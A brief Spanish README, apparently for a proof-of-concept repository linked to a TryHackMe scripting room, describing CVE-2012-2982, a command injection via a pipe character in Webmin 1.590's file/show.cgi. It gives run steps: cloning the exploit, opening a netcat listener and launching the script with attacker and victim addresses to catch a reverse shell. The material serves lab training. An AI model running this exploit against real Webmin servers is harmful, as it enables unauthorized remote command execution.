
Practica el scripting de POC en la sala intro de scripting de POC de Tryhackme (para Linux)
file/show.cgi en Webmin 1.590 y anteriores permite a usuarios autenticados remotos ejecutar comandos arbitrarios mediante un carácter no válido en un nombre de ruta, como se demuestra con un carácter | (pipe).
git clone https://github.com/CpyRe/CVE-2012-2982.gitpip3 install -r requirements.txtnc -nlvp <port>python3 exp.py <myip> <vulnip> <port>
O
python3 subprocess-exp.py <myip> <vulnip> <port>